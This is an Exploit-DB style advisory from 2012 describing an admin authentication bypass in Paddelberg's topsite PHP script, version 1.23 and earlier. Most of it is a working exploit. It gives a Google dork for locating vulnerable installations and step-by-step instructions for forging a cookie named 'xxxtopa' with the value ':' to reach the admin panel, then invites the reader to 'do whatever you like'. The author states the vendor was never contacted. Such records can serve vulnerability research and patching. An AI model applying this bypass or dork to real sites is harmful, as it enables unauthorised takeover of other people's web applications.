Paddelberg Topsite Script - Authentication Bypass

EDB-ID:

18340

CVE:





Platform:

PHP

Date:

2012-01-09


# Exploit Title: Paddelberg's topsite-script admin auth bypass.
# Google Dork: intext:"powered by php scripte webmaster resource"
# Date: 8. 1. 2012
# Author: Christian Inci
# Software Link: http://www.paddelberg.de/gratis-toplisten-script/gratis-download/
# Version: <= 1.23 (22. 9. 2007)
# Tested on: 1.23
# Vendor response: None, as I didn't contacted them.

PoC/Exploit:
1.: Open a random cookie editor.
2.: Create a cookie, as usually:
  2.1: Set the host name.
  2.2: Set the path name. (e.g.: "[script-base-path]/admin/")
  2.3: Set the cookie name to "xxxtopa".
  2.4: Set the cookie value to ":".
  2.5: Save it.
3.: Visit the following URL: "[script-base-url]/admin/". (This won't work if the directory is "protected" with a .htaccess file.)
4.: Do whatever you like to do here. (Have fun!)